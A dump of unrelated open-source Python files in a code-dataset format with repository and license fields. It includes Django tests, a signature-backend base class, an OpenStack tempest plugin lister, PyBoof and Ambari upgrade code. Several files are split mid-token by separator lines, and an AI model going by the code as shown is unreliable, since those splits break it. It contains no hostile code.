elif fieldname == "conversion_factor" and not item.get("conversion_factor"):
item.set(fieldname, value)
if ret.get("pricing_rule"):
# if user changed the discount percentage then set user's discount percentage ?
item.set("discount_percentage", ret.get("discount_percentage"))
if ret.get("pricing_rule_for") == "Price":
item.set("pricing_list_rate", ret.get("pricing_list_rate"))
if item.price_list_rate:
item.ra
|
USGSDenverPychron/pychron
|
pychron/updater/branch_view.py
|
Python
|
apache-2.0
| 2,723
| 0.002571
|
# # ===============================================================================
# # Copyright 2015 Jake Ross
# #
# # Licensed under the Apache License, Version 2.0 (the "License");
# # you may not use this file except in compliance with the License.
# # You may obtain a copy of the License at
# #
# # http://www.apache.org/licenses/LICENSE-2.0
# #
# # Unless required by applicable law or agreed to in writing, software
# # distributed under the License is distributed on an "AS IS" BASIS,
# # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# # See the License for the specific language governing permissions and
# # limitations under the License.
# # ===============================================================================
#
# # ============= enthought library imports =======================
# from __future__ import absolute_import
# from traitsui.api import View, UItem, HGroup, VGroup
# from traitsui.editors.api import EnumEditor
# from traitsui.handler import Controller
# # ============= standard library imports ========================
# # ============= local library imports ==========================
# from pychron.envisage.icon_button_editor import icon_button_editor
#
#
# class NewBranchView(Controller):
# def traits_view(self):
# v = View(UItem('new_branch_name'),
# title='New Branch Name',
# width=300,
#
|
kind='livemodal',
# buttons=['OK', 'Cancel'])
# return v
#
#
# class ManageBran
|
chView(Controller):
# def traits_view(self):
# v = View(
# VGroup(
# VGroup(HGroup(UItem('branch', editor=EnumEditor(name='all_branches')),
# # icon_button_editor('build_button', 'bricks',
# # tooltip='Build selected branch and set as current application'),
# icon_button_editor('checkout_branch_button', 'bricks',
# tooltip='Checkout selected branch'),
# icon_button_editor('pull_button', 'arrow_down',
# tooltip='Update Branch'),
# show_border=True,
# label='Current Branch'))),
# # VGroup(UItem('edit_branch', editor=EnumEditor(name='branches')),
# # UItem('delete_button', enabled_when='delete_enabled'),
# # show_border=True)),
# title='Manage Branch View',
# buttons=['OK', 'Cancel'])
# return v
#
# # ============= EOF =============================================
|
Transkribus/TranskribusDU
|
TranskribusDU/util/geoTools.py
|
Python
|
bsd-3-clause
| 2,557
| 0.030504
|
from rtree import index
import numpy as np
#from shapely.prepared import prep
import shapely
def polygon2points(p):
"""
convert a polygon to a sequence of points for DS documents
:param p: shapely.geometry.Polygon
returns a string representing the set of points
"""
return ",".join(list("%s,%s"%(x,y) for x,y in p.exterior.coords))
def sPoints2tuplePoints(s):
"""
convert a string (from DSxml) to a polygon
:param s: string = 'x,y x,y...'
returns a Geometry
"""
# lList = s.split(',')
# return [(float(x),float(y)) for x,y in zip(lList[0::2],lList[1::2])]
return [ (float(x),float(y)) for sxy in s.split(' ') for (x,y) in sxy.split(',') ]
def iuo(z1,z2):
"""
intersection over
|
union
:param z1: polygon
:param z2: polygon
returns z1.intersection(z2) / z1.union(z2)
"""
assert z1.isvalid
assert z2.isvalid
return z1.intersection(z2) / z1.union(z2)
def populateGeo(lZones:list(),lElements:list()):
"""
affect lElements i to lZones using argmax(overlap(elt,zone)
"""
lIndElements = index.Index()
|
dPopulated = {}
for pos, z in enumerate(lZones):
# lIndElements.insert(pos, cell.toPolygon().bounds)
# print (cell,cell.is_valid,cell.bounds)
lIndElements.insert(pos, z.bounds)
aIntersection = np.zeros((len(lElements),len(lZones)),dtype=float)
for j,elt in enumerate(lElements):
ll = lIndElements.intersection(elt.bounds)
for x in ll:
try:aIntersection[j][x] = elt.intersection(lZones[x]).area
except shapely.errors.TopologicalError: pass #This operation could not be performed. Reason: unknown
for i,e in enumerate(lElements):
best = np.argmax(aIntersection[i])
# aIntersection == np.zeros : empty
if aIntersection[i][best]>0:
try: dPopulated[best].append(i)
except KeyError:dPopulated[best] = [i]
return dPopulated
if __name__ == "__main__":
# def test_geo():
from shapely.geometry import Polygon
lP= []
for i in range(0,100,10):
lP.append(Polygon(((i,i),(i,i+10),(i+10,i+10),(i+10,i))))
# print (lP[-1])
lE= []
for i in range(0,100,5):
lE.append(Polygon(((i,i),(i,i+9),(i+9,i+9),(i+9,i))))
# print (lE[-1])
dres = populateGeo(lP,lE)
for item in dres:
print (lE[item],[lE[x].wkt for x in dres[item]])
# print(polygon2points(lP[0]))
|
miceno/django-categories
|
categories/tests/test_admin.py
|
Python
|
apache-2.0
| 1,919
| 0.001563
|
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import Client, TestCase
from categories.models import Category
class TestCategoryAdmin(Tes
|
tCase):
def setUp(self):
self.client = Client()
def test_adding_parent_and_child(self):
User.objects.create_superuser('testuser', 'testuser@example.com', 'password')
self.client.login(username='testuser', password='password')
url = reverse('admin:categories_category_add')
data = {
'parent': '',
'name': "Parent",
'thumbnail': '',
'filename': '',
'active': 'on',
|
'alternate_title': '',
'alternate_url': '',
'description': '',
'meta_keywords': '',
'meta_extra': '',
'order': 0,
'slug': 'parent',
'_save': '_save',
}
resp = self.client.post(url, data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(1, Category.objects.count())
# update parent
data.update({'name': 'Parent (Changed)'})
resp = self.client.post(reverse('admin:categories_category_change', args=(1,)), data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(1, Category.objects.count())
# add a child
data.update({
'parent': '1',
'name': 'Child',
'slug': 'child',
})
resp = self.client.post(url, data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(2, Category.objects.count())
# update child
data.update({'name': 'Child (Changed)'})
resp = self.client.post(reverse('admin:categories_category_change', args=(2,)), data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(2, Category.objects.count())
|
novafloss/django-anysign
|
django_anysign/backend.py
|
Python
|
bsd-3-clause
| 5,255
| 0
|
"""Base material for signature backends."""
from django.urls import reverse
class SignatureBackend(object):
"""Encapsulate signature workflow and integration with vendor backend.
Here is a typical workflow:
* :class:`~django_anysign.models.SignatureType` instance is created. It
encapsulates the backend type and its configuration.
* A :class:`~django_anysign.models.Signature` instance is created.
The signature instance has a signature type attribute, hence a backend.
* Signers are notified, by email, text or whatever. They get an hyperlink
to the "signer view". The URL may vary depending on the signature
backend.
* A signer goes to the backend's "signer view" entry point: typically a
view that integrates backend specific form to sign a document.
* Most backends have a "notification view", for the third-party service to
signal updates.
* Most backends have a "signer return view", where the signer is redirected
when he ends the signature process (whatever signature status).
* The backend's specific workflow can be made of several views. At the
beginning, there is a Signature instance which carries data (typically a
document). At the end, Signature is done.
"""
def __init__(self, name, code, url_namespace='anysign', **kwargs):
"""Configure backend."""
#: Human-readable name.
self.name = name
#: Machine-readable name. Should be lowercase alphanumeric only, i.e.
#: PEP-8 compliant.
self.code = code
#: Namespace for URL resolution.
self.url_namespace = url_namespace
def send_signature(self, signature):
"""Initiate the signature process.
At this state, the signature object has been configured.
Typical implementation consists in sending signer URL to first signer.
Raise ``NotImplementedError`` if the backend does not support such a
feature.
"""
raise NotImplementedError()
def get_signer_url(self, signer):
"""Return URL where signer signs document.
Raise ``NotImplementedError`` in case the backend does not support
"signer view" feature.
Default implementation reverses :meth:`get_signer_url_name` with
``signer.pk`` as argument.
"""
return reverse(self.get_signer_url_name(), args=[signer.pk])
def get_signer_url_name(self):
"""Return URL name where signer signs document.
Raise ``NotImplementedError`` i
|
n case the backend does not support
"signer view" feature.
Default implementation returns ``anysign:signer``.
|
"""
return '{ns}:signer'.format(ns=self.url_namespace)
def get_signer_return_url(self, signer):
"""Return absolute URL where signer is redirected after signing.
The URL must be **absolute** because it is typically used by external
signature service: the signer uses external web UI to sign the
document(s) and then the signature service redirects the signer to
(this) `Django` website.
Raise ``NotImplementedError`` in case the backend does not support
"signer return view" feature.
Default implementation reverses :meth:`get_signer_return_url_name`
with ``signer.pk`` as argument.
"""
return reverse(
self.get_signer_return_url_name(),
args=[signer.pk])
def get_signer_return_url_name(self):
"""Return URL name where signer is redirected once document has been
signed.
Raise ``NotImplementedError`` in case the backend does not support
"signer return view" feature.
Default implementation returns ``anysign:signer_return``.
"""
return '{ns}:signer_return'.format(ns=self.url_namespace)
def get_signature_callback_url(self, signature):
"""Return URL where backend can post signature notifications.
Raise ``NotImplementedError`` in case the backend does not support
"signature callback url" feature.
Default implementation reverses :meth:`get_signature_callback_url_name`
with ``signature.pk`` as argument.
"""
return reverse(
self.get_signature_callback_url_name(),
args=[signature.pk])
def get_signature_callback_url_name(self):
"""Return URL name where backend can post signature notifications.
Raise ``NotImplementedError`` in case the backend does not support
"signer return view" feature.
Default implementation returns ``anysign:signature_callback``.
"""
return '{ns}:signature_callback'.format(ns=self.url_namespace)
def create_signature(self, signature):
"""Register ``signature`` in backend, return updated object.
This method is typically called by views which create
:class:`~django_anysign.models.Signature` instances.
If backend stores a signature object, then implementation should update
:attr:`~django_anysign.models.Signature.signature_backend_id`.
Base implementation does nothing: override this method in backends.
"""
return signature
|
cisco-openstack/tempest
|
tools/generate-tempest-plugins-list.py
|
Python
|
apache-2.0
| 4,796
| 0
|
#! /usr/bin/env python
# Copyright 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# This script is intended to be run as part of a periodic proposal bot
# job in OpenStack infrastructure.
#
# In order to function correctly, the environment in which the
# script runs must have
# * network access to the review.opendev.org Gerrit API
# working directory
# * network access to https://opendev.org/openstack
import json
import re
import sys
import urllib3
from urllib3.util import retry
# List of projects having tempest plugin stale or unmaintained for a long time
# (6 months or more)
# TODO(masayukig): Some of these can be removed from BLACKLIST in the future
# when the patches are merged.
BLACKLIST = [
'x/gce-api', # It looks gce-api doesn't support python3 yet.
'x/glare', # To avoid sanity-job failure
'x/group-based-policy', # It looks this doesn't support python3 yet.
'x/intel-nfv-ci-tests', # https://review.opendev.org/#/c/634640/
'openstack/networking-generic-switch',
# https://review.opendev.org/#/c/634846/
'openstack/networking-l2gw-tempest-plugin',
# https://review.opendev.org/#/c/635093/
'openstack/networking-midonet', # https://review.opendev.org/#/c/635096/
'x/networking-plumgrid', # https://review.opendev.org/#/c/635096/
'x/networking-spp', # https://review.opendev.org/#/c/635098/
'openstack/neutron-dynamic-routing',
# https://review.opendev.org/#/c/637718/
'openstack/neutron-vpnaas', # https://review.opendev.org/#/c/637719/
'x/tap-as-a-service', # To avoid sanity-job failure
'x/valet', # https://review.opendev.org/#/c/638339/
'x/kingbird', # https://bugs.launchpad.net/kingbird/+bug/1869722
# vmware-nsx is blacklisted since https://review.opendev.org/#/c/736952
'x/vmware-nsx-tempest-plugin',
]
url = 'https://review.opendev.org/projects/'
# This is what a project looks like
'''
"openstack-attic/akanda": {
"id": "openstack-attic%2Fakanda",
"state": "READ_ONLY"
},
'''
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')
retries = retry.Retry(status_forcelist=[500], backoff_factor=1.0)
def has_tempest_plugin(proj):
try:
r = http.request('GET', "https://opendev.org/%s/raw/branch/"
"master/setup.cfg" % proj, retries=retries)
if r.status == 404:
return False
except urllib3.exceptions.MaxRetryError as err:
# We should not ignore non 404 errors.
raise err
p = re.compile(r'^tempest\.test_plugins', re.M)
if p.findall(r.data.decode('utf-8')):
return True
else:
False
if len(sys.argv) > 1 and sys.argv[1] == 'blacklist':
for black_plugin in BLACKLIST:
print(black_plugin)
# We just need BLACKLIST when we use this `blacklist` option.
# So, this exits here.
sys.exit()
r = http.request('GET', url, retries=retries)
# Gerrit prepends 4 garbage octets to the JSON, in order to counter
# cross-site scripting attacks. Therefore we must discard it so the
# json library won't choke.
content = r.data.decode('utf-8')[4:]
projects = sorted(json.loads(content))
# Retrieve projects having no deployment tool repo (such as deb,
# puppet, ansible, etc.), infra repos, ui or spec namespace as those
# namespaces do not contains tempest plugins.
projects_list = [i for i in projects if not (
i.startswith('openstack-dev/') or
i.startswith('openstack-infra/') or
i.startswith('openstack/ansible-') or
i.startswith('openstack/charm-') or
i.startswith('openstack/cookbook-openstack-') or
i.startswith('openstack/devstack-') or
i.startswith('openstack/fuel-') or
i.startswith('openstack/deb-') or
i.startswith('openstack/puppet-') or
i.startswith('openstack/openstack-ansible-') or
i.startswith('x/deb-') or
i.startswith('x/fuel-') or
i.startswith('x/python-') or
i.startswith('zuul/') or
i.endswith('-ui') or
i.endswith('-specs'))]
found_plugins = list(filter(has_tempest_plugin, projects_
|
list))
# We have tempest plugins not only in 'openstack/' n
|
amespace but also the
# other name spaces such as 'airship/', 'x/', etc.
# So, we print all of them here.
for project in found_plugins:
print(project)
|
lessthanoptimal/PyBoof
|
examples/scene_recognition.py
|
Python
|
apache-2.0
| 2,120
| 0.00283
|
#!/usr/bin/env python3
import glob
import numpy as np
import pyboof as pb
# Scene recognition is defined here as the problem where you wish to find multiple views of the same scene
# In this example we will load a set of images that has sets of 3 related images. We will tell it to find the 5
# most similar images so that you can see what it does when it fails to find a good match
# Get a list of all images which we wish to search
list_images = list(glob.glob("../data/example/recognition/scene/*.jpg"))
list_images.sort()
# Create an instance of SceneRecognition. This will take in images as input
recognizer = pb.FactorySceneRecognition(np.uint8).scene_recognition()
# First we need to create a model so that it knows how to describe a model. BoofCV does provide a
# pre-build model generated from vacation photos. This is fast enough that often its just easier to train it
# on the images you plan to search.
print("Learning the model. This can take a moment or two.")
recognizer.learn_model(list_images)
# Alternatively you can comment out the code above (lines 18 to 24) and load
# a pre-build model by uncommenting the line below
# recognizer = pb.download_default_scene_recognition(np.uint8, "saved_models")
# Now add all the images that we wish to look up
print("Adding images to the database")
for image_file in list_images:
boof_gray = pb.load_single_band(image_file, np.uint8)
recognizer.add_image(image_file, boof_gray)
# Let's look one up and see which images are related
print("Making a query: ", list_images[6])
query_image = pb.load_single_band(list_images[6], np.uint8)
found_matches = recognizer.query(query_image, 5)
# We are expecting 3 matches to be first, then other two will be incorrect/noise
print("len={}".format(len(found_matches)))
print("\nResults:")
for m in found_matches:
print("{:s} error={:f}".format(m["id"], m[
|
"error"]))
# Display the results
image_list = [(query_image, "Query")]
for m in found_matche
|
s:
image_list.append((pb.load_planar(m["id"], np.uint8), m["id"]))
pb.swing.show_list(image_list, title="Query Results")
input("Press any key to exit")
|
HimmelStein/lg-flask
|
models.py
|
Python
|
mit
| 578
| 0.00173
|
from app import db
from sqlalchemy.dialects.postgresql import JSON
class ChBible(db.Mo
|
del):
__tablename__ = 'chbible'
id = db.Column(db.Integer, primary_key=True)
bbid = db.Column(db.String())
snt = db.Column(db.String())
snt_lg = db.Column(db.String())
snt_sdg = db.Column(db.String(
|
))
def __init__(self, bbid, snt, snt_lg, snt_sdg):
self.url = bbid
self.snt = snt
self.snt_lg = snt_lg
self.snt_sdg = snt_sdg
def __repr__(self):
return '<id {0}> <{1}> {2}\n'.format(self.id, self.bbid, self.snt)
|
sharkspeed/dororis
|
packages/python/flask/flask-dog-book/7-chapter/app/main/__init__.py
|
Python
|
bsd-2-clause
| 143
| 0.006993
|
#!/usr/bin/env pytho
|
n
# -*- coding: utf-8 -*-
from flask import Blueprint
main = Blueprint('main', __name__)
from . import views, erro
|
rs
|
BurtBiel/autorest
|
AutoRest/Generators/Python/Azure.Python.Tests/Expected/AcceptanceTests/AzureResource/setup.py
|
Python
|
mit
| 1,161
| 0
|
# coding=utf
|
-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from set
|
uptools import setup, find_packages
NAME = "autorestresourceflatteningtestservice"
VERSION = "1.0.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["msrest>=0.2.0", "msrestazure>=0.2.1"]
setup(
name=NAME,
version=VERSION,
description="AutoRestResourceFlatteningTestService",
author_email="",
url="",
keywords=["Swagger", "AutoRestResourceFlatteningTestService"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
Resource Flattening for AutoRest
"""
)
|
seewindcn/tortoisehg
|
src/tortoisehg/util/hgversion.py
|
Python
|
gpl-2.0
| 1,003
| 0.000997
|
# hgversion.py - Version information for Mercurial
#
# Copyright 2009 Steve Borho <steve@borho.org>
#
# This software may b
|
e used and distributed according to the terms of the
# GNU General Public Licen
|
se version 2, incorporated herein by reference.
import re
try:
# post 1.1.2
from mercurial import util
hgversion = util.version()
except AttributeError:
# <= 1.1.2
from mercurial import version
hgversion = version.get_version()
testedwith = '3.6 3.7'
def checkhgversion(v):
"""range check the Mercurial version"""
reqvers = testedwith.split()
v = v.split('+')[0]
if not v or v == 'unknown' or len(v) >= 12:
# can't make any intelligent decisions about unknown or hashes
return
vers = re.split(r'\.|-', v)[:2]
if len(vers) < 2:
return
if '.'.join(vers) in reqvers:
return
return ('This version of TortoiseHg requires Mercurial version %s.n to '
'%s.n, but found %s') % (reqvers[0], reqvers[-1], v)
|
F483/bikesurf.org
|
apps/account/urls.py
|
Python
|
mit
| 928
| 0.017241
|
# -*- coding: utf-8 -*-
# Copyright (c) 2012 Fabian Barkhau <fabian.barkhau@gmail.com>
# License: MIT (see LICENSE.TXT file)
from django.conf.urls import patterns, include, url
from apps.common.urls import arg_id, arg_slug, arg_username
L = arg_id(
|
"link_id")
U = arg_username("username")
urlpatterns = patterns("apps.account.views",
url(r"^account/profile$", "profile"),
url(r"^account/view/%s$" % U, "view"),
url(r"^account/set_passport$", "set_passport", { "wizard" : False }),
url(r"^account/edit$",
|
"edit", { "wizard" : False }),
url(r"^account/link/create$", "link_create"),
url(r"^account/link/delete/%s$" % L, "link_delete"),
# this url because allauth
url(r"^accounts/profile/$", "edit", { "wizard" : True }),
url(r"^account/wiz/passport", "set_passport", { "wizard" : True }),
)
|
smitchell556/cuttle
|
cuttle/__init__.py
|
Python
|
mit
| 137
| 0
|
#
|
-*- coding: utf-8 -*-
"""
Cuttle, the simple, extendable ORM.
:license: MIT, see LICENSE for details.
"""
__versi
|
on__ = '0.9.0.dev'
|
release-monitoring/anitya
|
anitya/tests/lib/backends/test_npmjs.py
|
Python
|
gpl-2.0
| 9,246
| 0.000108
|
# -*- coding: utf-8 -*-
#
# Copyright © 2014-2019 Red Hat, Inc.
#
# This copyrighted materi
|
al is made available to anyone wishing to use,
# modify, copy, or redistribute it subje
|
ct to the terms and conditions
# of the GNU General Public License v.2, or (at your option) any later
# version. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details. You
# should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Any Red Hat trademarks that are incorporated in the source
# code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission
# of Red Hat, Inc.
#
"""
anitya tests for the custom backend.
"""
import unittest
import mock
import anitya.lib.backends.npmjs as backend
from anitya.db import models
from anitya.lib.exceptions import AnityaPluginException
from anitya.tests.base import DatabaseTestCase, create_distro
BACKEND = "npmjs"
class NpmjsBackendtests(DatabaseTestCase):
"""Drupal backend tests."""
def setUp(self):
"""Set up the environnment, ran before every tests."""
super(NpmjsBackendtests, self).setUp()
create_distro(self.session)
self.create_project()
def create_project(self):
"""Create some basic projects to work with."""
project = models.Project(
name="request",
homepage="https://www.npmjs.org/package/request",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
project = models.Project(
name="non-existent-package-that-does-not-exist",
homepage="https://www.npmjs.org/package/non-existent-package-that-does-not-exist",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
project = models.Project(
name="colors",
homepage="https://www.npmjs.org/package/colors",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
def test_get_version(self):
"""Test the get_version function of the npmjs backend."""
pid = 1
project = models.Project.get(self.session, pid)
exp = "2.83.0"
obs = backend.NpmjsBackend.get_version(project)
self.assertEqual(obs, exp)
pid = 2
project = models.Project.get(self.session, pid)
self.assertRaises(
AnityaPluginException, backend.NpmjsBackend.get_version, project
)
pid = 3
project = models.Project.get(self.session, pid)
exp = "1.2.0"
obs = backend.NpmjsBackend.get_version(project)
self.assertEqual(obs, exp)
def test_get_version_url(self):
"""
Assert that correct url is returned.
"""
project = models.Project(
name="test", homepage="https://example.org", backend=BACKEND
)
exp = "https://registry.npmjs.org/test"
obs = backend.NpmjsBackend.get_version_url(project)
self.assertEqual(obs, exp)
def test_get_version_not_modified(self):
"""Assert that not modified response is handled correctly"""
pid = 1
project = models.Project.get(self.session, pid)
exp_url = "https://registry.npmjs.org/request"
with mock.patch("anitya.lib.backends.BaseBackend.call_url") as m_call:
m_call.return_value = mock.Mock(status_code=304)
versions = backend.NpmjsBackend.get_version(project)
m_call.assert_called_with(exp_url, last_change=None)
self.assertEqual(versions, None)
def test_get_versions(self):
"""Test the get_versions function of the npmjs backend."""
pid = 1
project = models.Project.get(self.session, pid)
exp = [
"0.8.3",
"0.9.0",
"0.9.1",
"0.9.5",
"0.10.0",
"1.0.0",
"1.1.0",
"1.1.1",
"1.2.0",
"1.9.0",
"1.9.1",
"1.9.2",
"1.9.3",
"1.9.5",
"1.9.7",
"1.9.8",
"1.9.9",
"2.0.0",
"2.0.1",
"2.0.2",
"2.0.3",
"2.0.4",
"2.0.5",
"2.1.0",
"2.1.1",
"2.2.0",
"2.2.5",
"2.2.6",
"2.2.9",
"2.9.0",
"2.9.1",
"2.9.2",
"2.9.3",
"2.9.100",
"2.9.150",
"2.9.151",
"2.9.152",
"2.9.153",
"2.9.200",
"2.9.201",
"2.9.202",
"2.9.203",
"2.10.0",
"2.11.0",
"2.11.1",
"2.11.2",
"2.11.3",
"2.11.4",
"2.12.0",
"2.14.0",
"2.16.0",
"2.16.2",
"2.16.4",
"2.16.6",
"2.18.0",
"2.19.0",
"2.20.0",
"2.21.0",
"2.22.0",
"2.23.0",
"2.24.0",
"2.25.0",
"2.26.0",
"2.27.0",
"2.28.0",
"2.29.0",
"2.30.0",
"2.31.0",
"2.32.0",
"2.33.0",
"2.34.0",
"2.35.0",
"2.36.0",
"2.37.0",
"2.38.0",
"2.39.0",
"2.40.0",
"2.41.0",
"2.42.0",
"2.43.0",
"2.44.0",
"2.45.0",
"2.46.0",
"2.47.0",
"2.48.0",
"2.49.0",
"2.50.0",
"2.51.0",
"2.52.0",
"2.53.0",
"2.54.0",
"2.55.0",
"2.56.0",
"2.57.0",
"2.58.0",
"2.59.0",
"2.60.0",
"2.61.0",
"2.62.0",
"2.63.0",
"2.64.0",
"2.65.0",
"2.66.0",
"2.67.0",
"2.68.0",
"2.69.0",
"2.70.0",
"2.71.0",
"2.72.0",
"2.73.0",
"2.74.0",
"2.75.0",
"2.76.0",
"2.77.0",
"2.78.0",
"2.79.0",
"2.80.0",
"2.81.0",
"2.82.0",
"2.83.0",
]
obs = backend.NpmjsBackend.get_ordered_versions(project)
self.assertEqual(obs, exp)
pid = 2
project = models.Project.get(self.session, pid)
self.assertRaises(
AnityaPluginException, backend.NpmjsBackend.get_versions, project
)
pid = 3
project = models.Project.get(self.session, pid)
exp = [
"0.3.0",
"0.5.0",
"0.5.1",
"0.6.0",
"0.6.0-1",
"0.6.1",
"0.6.2",
"1.0.0",
"1.0.1",
"1.0.2",
"1.0.3",
"1.1.0",
"1.1.1",
"1.1.2",
"1.2.0-rc0",
"1.2.0",
]
obs = backend.NpmjsBackend.get_ordered_versions(project)
self.assertEqual(obs, exp)
def test_get_versions_not_modified(self):
"""Assert that not modified response is handled correctly"""
pid = 1
project = models.Project.get(self.session, pid)
exp_url = "https://registry.npmjs.org/request"
with mock.patch("anitya.lib.backends.BaseBackend.call_url") as m_call:
m_call.return_value = mock.Mock(status_code=304)
versions = backend.NpmjsBackend.get_versions(project)
m_call.assert_called_with(exp_url, last_change=None)
self.assertEqual(versions, [])
de
|
telefonicaid/fiware-cosmos-ambari
|
ambari-agent/src/main/python/ambari_agent/UpgradeExecutor.py
|
Python
|
apache-2.0
| 6,975
| 0.013333
|
#!/usr/bin/env python2.6
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import os.path
import logging
import pprint
import re
from Grep import Grep
from StackVersionsFileHandler import StackVersionsFileHandler
logger = logging.getLogger()
grep = Grep()
class UpgradeExecutor:
""" Class that performs the StackVersion stack upgrade"""
SCRIPT_DIRS = [
'pre-upgrade.d',
'upgrade.d',
'post-upgrade.d'
]
NAME_PARSING_FAILED_CODE = 999
def __init__(self, pythonExecutor, puppetExecutor, config):
self.pythonExecutor = pythonExecutor
self.puppetExecutor = puppetExecutor
self.stacksDir = config.get('stack', 'upgradeScriptsDir')
self.config = config
versionsFileDir = config.get('agent', 'prefix')
self.versionsHandler = StackVersionsFileHandler(versionsFileDir)
def perform_stack_upgrade(self, command, tmpout, tmperr):
logger.info("Performing stack upgrade")
params = command['commandParams']
srcStack = params['source_stack_version']
tgtStack = params['target_stack_version']
component = command['role']
srcStackTuple = self.split_stack_version(srcStack)
tgtStackTuple = self.split_stack_version(tgtStack)
if srcStackTuple is None or tgtStackTuple is None:
errorstr = "Source (%s) or target (%s) version does not match pattern \
<Name>-<Version>" % (srcStack, tgtStack)
logger.info(errorstr)
result = {
'exitcode' : 1,
'stdout' : 'None',
'stderr' : errorstr
}
elif srcStack != tgtStack:
paramTuple = sum((srcStackTuple, tgtStackTuple), ())
upgradeId = "%s-%s.%s_%s-%s.%s" % paramTuple
# Check stack version (do we need upgrade?)
basedir = os.path.join(self.stacksDir, upgradeId, component)
if not os.path.isdir(basedir):
errorstr = "Upgrade %s is not supported (dir %s does not exist)" \
% (upgradeId, basedir)
logger.error(errorstr)
result = {
'exitcode' : 1,
'stdout' : errorstr,
'stderr' : errorstr
}
else:
result = {
'exitcode' : 0,
'stdout' : '',
'stderr' : ''
}
# Request repos update (will be executed once before running any pp file)
self.puppetExecutor.discardInstalledRepos()
for dir in self.SCRIPT_DIRS:
if result['exitcode'] != 0:
break
tmpRes = self.execute_dir(command, basedir, dir, tmpout, tmperr)
result = {
'exitcode' : result['exitcode'] or tmpRes['exitcode'],
'stdout' : "%s\n%s" % (result['stdout'], tmpRes['stdout']),
'stderr' : "%s\n%s" % (result['stderr'], tmpRes['stderr']),
}
if result['exitcode'] == 0:
logger.info("Upgrade %s successfully finished" % upgradeId)
self.versionsHandler.write_stack_version(component, tgtStack)
else:
infostr = "target_stack_version (%s) matches current stack version" \
" for component %s, nothing to do" % (tgtStack, component)
logger.info(infostr)
result = {
'exitcode' : 0,
'stdout' : infostr,
'stderr' : 'None'
}
result = {
'exitcode' : result['exitcode'],
'stdout' : grep.tail(result['stdout'], grep.OUTPUT_LAST_LINES),
'stderr' : grep.tail(result['stderr'], grep.OUTPUT_LAST_LINES)
}
return result
def get_key_func(self, name):
"""
Returns a number from filenames like 70-foobar.* or 999 for not matching
filenames
"""
parts = name.split('-', 1)
if not parts or not parts[0].isdigit():
logger.warn("Can't parse script filename number %s" % name)
return self.NAME_PARSING_FAILED_CODE # unknown element will be placed to the end of list
return int(parts[0])
def split_stack_version(self, verstr):
verdict = json.loads(verstr)
stack_name = verdict["stackName"].strip()
matchObj = re.match( r'(\d+).(\d+)', verdict["stackVersion"].strip(), re.M|re.I)
if matchObj:
stack_major_ver = matchObj.group(1)
stack_minor_ver = matchObj.group(2)
return stack_name, stack
|
_major_ver, stack_minor_ver
else:
return None
def execute_dir(self, command, basedir, dir, tmpout, tmperr):
"""
Executes *.py and *.pp files locat
|
ed in a given directory.
Files a executed in a numeric sorting order.
"""
dirpath = os.path.join(basedir, dir)
logger.info("Executing %s" % dirpath)
if not os.path.isdir(dirpath):
warnstr = "Script directory %s does not exist, skipping" % dirpath
logger.warn(warnstr)
result = {
'exitcode' : 0,
'stdout' : warnstr,
'stderr' : 'None'
}
return result
fileList=os.listdir(dirpath)
fileList.sort(key = self.get_key_func)
formattedResult = {
'exitcode' : 0,
'stdout' : '',
'stderr' : ''
}
for filename in fileList:
prevcode = formattedResult['exitcode']
if prevcode != 0 or self.get_key_func(filename) == self.NAME_PARSING_FAILED_CODE:
break
filepath = os.path.join(dirpath, filename)
if filename.endswith(".pp"):
logger.info("Running puppet file %s" % filepath)
result = self.puppetExecutor.run_manifest(command, filepath,
tmpout, tmperr)
elif filename.endswith(".py"):
logger.info("Running python file %s" % filepath)
result = self.pythonExecutor.run_file(command, filepath, tmpout, tmperr)
elif filename.endswith(".pyc"):
pass # skipping compiled files
else:
warnstr = "Unrecognized file type, skipping: %s" % filepath
logger.warn(warnstr)
result = {
'exitcode' : 0,
'stdout' : warnstr,
'stderr' : 'None'
}
formattedResult = {
'exitcode' : prevcode or result['exitcode'],
'stdout' : "%s\n%s" % (formattedResult['stdout'], result['stdout']),
'stderr' : "%s\n%s" % (formattedResult['stderr'], result['stderr']),
}
